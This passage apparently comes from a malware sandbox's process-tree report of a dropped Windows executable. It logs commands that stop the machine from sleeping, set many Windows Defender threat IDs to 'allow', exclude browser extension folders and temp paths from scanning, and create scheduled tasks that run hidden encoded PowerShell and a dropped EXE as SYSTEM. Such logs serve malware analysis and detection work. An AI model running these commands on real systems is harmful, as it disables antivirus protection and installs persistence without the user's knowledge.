                                                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                      2⤵
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:1616
                                                                    • C:\Windows\system32\powercfg.exe
                                                                      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                      2⤵
                                                                        PID:3164
                                                                      • C:\Windows\system32\powercfg.exe
                                                                        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                        2⤵
                                                                          PID:228
                                                                        • C:\Windows\system32\conhost.exe
                                                                          C:\Windows\system32\conhost.exe
                                                                          2⤵
                                                                            PID:2388
                                                                          • C:\Windows\system32\svchost.exe
                                                                            svchost.exe
                                                                            2⤵
                                                                              PID:3796
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                            1⤵
                                                                              PID:4384
                                                                            • C:\Windows\system32\gpscript.exe
                                                                              gpscript.exe /RefreshSystemParam
                                                                              1⤵
                                                                                PID:3960
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4164 -ip 4164
                                                                                1⤵
                                                                                  PID:1264
                                                                                • C:\Windows\windefender.exe
                                                                                  C:\Windows\windefender.exe
                                                                                  1⤵
                                                                                  • Executes dropped EXE
                                                                                  • Modifies data under HKEY_USERS
                                                                                  PID:1616
                                                                                • C:\Users\Admin\AppData\Local\Temp\dYCYYvmNvBRqgTGOH\lchhETiXYelTvPX\XqppFsW.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\dYCYYvmNvBRqgTGOH\lchhETiXYelTvPX\XqppFsW.exe RD /nMsite_idkjt 525403 /S
                                                                                  1⤵
                                                                                  • Executes dropped EXE
                                                                                  • Drops file in System32 directory
                                                                                  PID:2444
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                                    2⤵
                                                                                    • Drops file in System32 directory
                                                                                    • Modifies data under HKEY_USERS
                                                                                    PID:4388
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                      3⤵
                                                                                        PID:2792
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                          4⤵
                                                                                            PID:4304
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                          3⤵
                                                                                            PID:4820
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                            3⤵
                                                                                              PID:4148
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                              3⤵
                                                                                                PID:3332
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                3⤵
                                                                                                  PID:2364
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                  3⤵
                                                                                                    PID:1120
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                    3⤵
                                                                                                      PID:116
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                      3⤵
                                                                                                        PID:4164
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                        3⤵
                                                                                                          PID:4528
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                          3⤵
                                                                                                            PID:2848
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                            3⤵
                                                                                                              PID:1724
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                              3⤵
                                                                                                                PID:4616
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                3⤵
                                                                                                                  PID:4696
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                  3⤵
                                                                                                                    PID:2288
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                    3⤵
                                                                                                                      PID:1604
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                      3⤵
                                                                                                                        PID:3900
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                        3⤵
                                                                                                                          PID:1300
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                          3⤵
                                                                                                                            PID:4848
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                            3⤵
                                                                                                                              PID:1492
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                              3⤵
                                                                                                                                PID:4196
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                3⤵
                                                                                                                                  PID:4240
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                  3⤵
                                                                                                                                    PID:4288
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                    3⤵
                                                                                                                                      PID:2504
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                      3⤵
                                                                                                                                        PID:2092
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                                                                        3⤵
                                                                                                                                          PID:4724
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                                                                          3⤵
                                                                                                                                            PID:4504
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                                                                            3⤵
                                                                                                                                              PID:4908
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                                                                              3⤵
                                                                                                                                                PID:3992
                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JqMoIWPtRqoDC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JqMoIWPtRqoDC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KuTytnbkU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KuTytnbkU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PSjUbWBFcPUKufSEFkR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PSjUbWBFcPUKufSEFkR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UotyJsAgSFUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UotyJsAgSFUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iyzAqDqghgpU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iyzAqDqghgpU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\dTRdFhcsEOtGTQVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\dTRdFhcsEOtGTQVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\dYCYYvmNvBRqgTGOH\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\dYCYYvmNvBRqgTGOH\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\gtigoJAOxebpSqst\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\gtigoJAOxebpSqst\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                              2⤵
                                                                                                                                              • Drops file in System32 directory
                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                              PID:3100
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JqMoIWPtRqoDC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                3⤵
                                                                                                                                                  PID:1556
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JqMoIWPtRqoDC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                    4⤵
                                                                                                                                                      PID:1444
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JqMoIWPtRqoDC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                    3⤵
                                                                                                                                                      PID:4420
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KuTytnbkU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                      3⤵
                                                                                                                                                        PID:844
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KuTytnbkU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                        3⤵
                                                                                                                                                          PID:4988
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PSjUbWBFcPUKufSEFkR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                          3⤵
                                                                                                                                                            PID:1268
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PSjUbWBFcPUKufSEFkR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                            3⤵
                                                                                                                                                              PID:4940
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UotyJsAgSFUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                              3⤵
                                                                                                                                                                PID:4736
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UotyJsAgSFUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:2232
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iyzAqDqghgpU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:5076
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iyzAqDqghgpU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:1672
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\dTRdFhcsEOtGTQVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:1880
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\dTRdFhcsEOtGTQVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:4480
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:4440
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:2248
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:3480
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:688
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\dYCYYvmNvBRqgTGOH /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:4524
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\dYCYYvmNvBRqgTGOH /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:4544
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\gtigoJAOxebpSqst /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:4264
                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\gtigoJAOxebpSqst /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:960
                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                        schtasks /CREATE /TN "gEWySOIDG" /SC once /ST 04:34:59 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                        PID:2424
                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                        schtasks /run /I /tn "gEWySOIDG"
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:4164
                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                          schtasks /DELETE /F /TN "gEWySOIDG"
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:1636
                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                            schtasks /CREATE /TN "tbikxcbubRAutxvXV" /SC once /ST 06:20:05 /RU "SYSTEM" /TR "\"C:\Windows\Temp\gtigoJAOxebpSqst\dzWYTvKGVWzrmLz\TXPKdNZ.exe\" wJ /fjsite_idwjO 525403 /S" /V1 /F
                                                                                                                                                                                            2⤵
                                                                                                                                                                                            • Drops file in Windows directory
